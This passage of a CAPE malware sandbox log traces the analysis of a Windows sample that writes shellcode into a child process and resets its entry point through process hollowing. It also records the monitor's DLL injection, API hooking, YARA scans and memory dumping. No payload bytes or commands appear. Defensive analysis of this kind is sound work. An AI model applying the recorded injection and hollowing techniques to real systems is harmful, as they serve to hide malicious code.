C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,123 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,123 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,123 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,123 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,123 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,123 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,138 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,138 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,138 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,138 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,138 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AB800 (size 0xe00) injected into process 7456.\n2025-03-02 21:32:30,138 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AB800 skipped due to dump limit 10\n2025-03-02 21:32:30,138 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,138 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,138 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,138 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,154 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,154 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,154 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,154 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,154 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,169 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,169 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,169 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,185 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,185 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,185 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,185 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AC600 (size 0x200) injected into process 7456.\n2025-03-02 21:32:30,185 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AC600 skipped due to dump limit 10\n2025-03-02 21:32:30,185 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,201 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,201 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,201 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,232 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,248 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,248 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,248 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,248 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,248 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,248 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,248 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,248 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,263 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,263 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,263 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AC800 (size 0x6400) injected into process 7456.\n2025-03-02 21:32:30,263 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AC800 skipped due to dump limit 10\n2025-03-02 21:32:30,263 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,263 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,263 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,263 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,310 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,341 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,388 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,669 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,685 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049B2C00 (size 0x2bc00) injected into process 7456.\n2025-03-02 21:32:30,701 [root] DEBUG: 4492: DumpMemory: Dump at 0x049B2C00 skipped due to dump limit 10\n2025-03-02 21:32:30,701 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,701 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,701 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,701 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,701 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,701 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-02 21:32:30,701 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,716 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,716 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,716 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,716 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,716 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,716 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,716 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,716 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,716 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x04970400 (size 0x39c00) injected into process 7456.\n2025-03-02 21:32:30,732 [root] DEBUG: 4492: DumpMemory: Dump at 0x04970400 skipped due to dump limit 10\n2025-03-02 21:32:30,732 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,732 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,732 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,732 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,732 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,732 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,748 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,748 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,748 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AA000 (size 0x600) injected into process 7456.\n2025-03-02 21:32:30,748 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AA000 skipped due to dump limit 10\n2025-03-02 21:32:30,748 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,748 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,748 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,748 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,763 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,763 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,763 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,763 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,779 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AA600 (size 0x1200) injected into process 7456.\n2025-03-02 21:32:30,779 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AA600 skipped due to dump limit 10\n2025-03-02 21:32:30,779 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,779 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,779 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,779 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,779 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,779 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,779 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,779 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,779 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,794 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,794 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,794 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,794 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,794 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,794 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,810 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AB800 (size 0xe00) injected into process 7456.\n2025-03-02 21:32:30,810 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AB800 skipped due to dump limit 10\n2025-03-02 21:32:30,810 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,810 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,810 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,810 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,810 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,810 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,810 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,810 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,810 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,810 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,826 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,826 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,826 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,826 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,826 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,826 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AC600 (size 0x200) injected into process 7456.\n2025-03-02 21:32:30,826 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AC600 skipped due to dump limit 10\n2025-03-02 21:32:30,826 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,826 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,826 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,826 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,841 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,841 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,841 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,841 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,841 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,841 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,841 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,841 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,857 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,857 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,857 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,857 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AC800 (size 0x6400) injected into process 7456.\n2025-03-02 21:32:30,857 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AC800 skipped due to dump limit 10\n2025-03-02 21:32:30,857 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,857 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,857 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,857 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,857 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,857 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,857 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,873 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,873 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049B2C00 (size 0x2bc00) injected into process 7456.\n2025-03-02 21:32:30,873 [root] DEBUG: 4492: DumpMemory: Dump at 0x049B2C00 skipped due to dump limit 10\n2025-03-02 21:32:30,873 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,873 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,873 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,873 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,888 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,888 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,888 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,888 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,888 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,888 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,888 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,904 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,904 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,904 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,904 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,904 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,904 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,904 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,919 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,919 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,919 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,919 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,919 [root] DEBUG: 4492: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x000E7001 (process 7456).\n2025-03-02 21:32:30,919 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,919 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,919 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,935 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,935 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,935 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,935 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,935 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,935 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,935 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,951 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,951 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-03-02 21:32:30,951 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,951 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,951 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,951 [root] DEBUG: 7456: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-02 21:32:30,951 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,951 [root] DEBUG: 7456: Dropped file limit defaulting to 100.\n2025-03-02 21:32:30,951 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,966 [root] INFO: Disabling sleep skipping.\n2025-03-02 21:32:30,966 [root] DEBUG: 7456: YaraInit: Compiled rules loaded from existing file C:\\tmp4qgvoq2_\\data\\yara\\capemon.yac\n2025-03-02 21:32:30,966 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:31,044 [root] DEBUG: InjectDllViaIAT: Not a new process, falling back to thread injection\n2025-03-02 21:32:31,044 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.\n2025-03-02 21:32:31,044 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:31,091 [root] DEBUG: 7456: YaraScan: Scanning 0x00400000, size 0x225bda\n2025-03-02 21:32:31,091 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:31,091 [root] DEBUG: 7456: CAPE_init: Main executable image temporarily remapped for scanning at 0x0A6C0000\n2025-03-02 21:32:31,091 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:31,091 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:31,091 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:31,107 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:31,107 [root] DEBUG: InjectDllViaIAT: Not a new process, falling back to thread injection\n2025-03-02 21:32:31,107 [root] DEBUG: InjectDllViaQueuedAPC: APC injection queued.\n2025-03-02 21:32:31,107 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:31,107 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:31,123 [root] INFO: Process with pid 4492 has terminated\n2025-03-02 21:32:31,123 [root] DEBUG: 7456: YaraScan: Scanning 0x0A6C0000, size 0x2e0346\n2025-03-02 21:32:31,123 [root] DEBUG: 4492: NtTerminateProcess hook: Attempting to dump process 4492\n2025-03-02 21:32:31,138 [root] DEBUG: 7456: AmsiDumper initialised.\n2025-03-02 21:32:31,138 [root] DEBUG: 4492: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-03-02 21:32:31,138 [root] DEBUG: 7456: Monitor initialised: 32-bit capemon loaded in process 7456 at 0x73340000, thread 7632, image base 0x400000, stack from 0x196000-0x1a0000\n2025-03-02 21:32:31,138 [root] DEBUG: 7456: Commandline: C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\n2025-03-02 21:32:31,154 [root] DEBUG: 7456: hook_api: LdrpCallInitRoutine export address 0x771C3190 obtained via GetFunctionAddress\n2025-03-02 21:32:31,169 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: set_hooks: Unable to hook GetCommandLineA\n2025-03-02 21:32:31,169 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: set_hooks: Unable to hook GetCommandLineW\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: Hooked 611 out of 613 functions\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: Syscall hook installed, syscall logging level 1\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: WoW64fix: Windows version 6.2 not supported.\n2025-03-02 21:32:31,169 [root] INFO: Loaded monitor into process with pid 7456\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: caller_dispatch: Added region at 0x08C60000 to tracked regions list (ntdll::LdrLoadDll returns to 0x08C6003E, thread 7632).\n2025-03-02 21:32:31,169 [root] DEBUG: 7456: DumpPEsInRange: Scanning range 0x08C60000 - 0x08C60130.\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: ScanForDisguisedPE: Size too small: 0x130 bytes\n2025-03-02 21:32:31,185 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\7456_1445405311223132025 to CAPE\\ba4a50037e0be83499bd7a55913acadcead8aa948f808606204d40ea6ffac34e; Size is 304; Max size: 100000000\n2025-03-02 21:32:31,185 [root] DEBUG: 7456: DumpMemory: Payload successfully created: 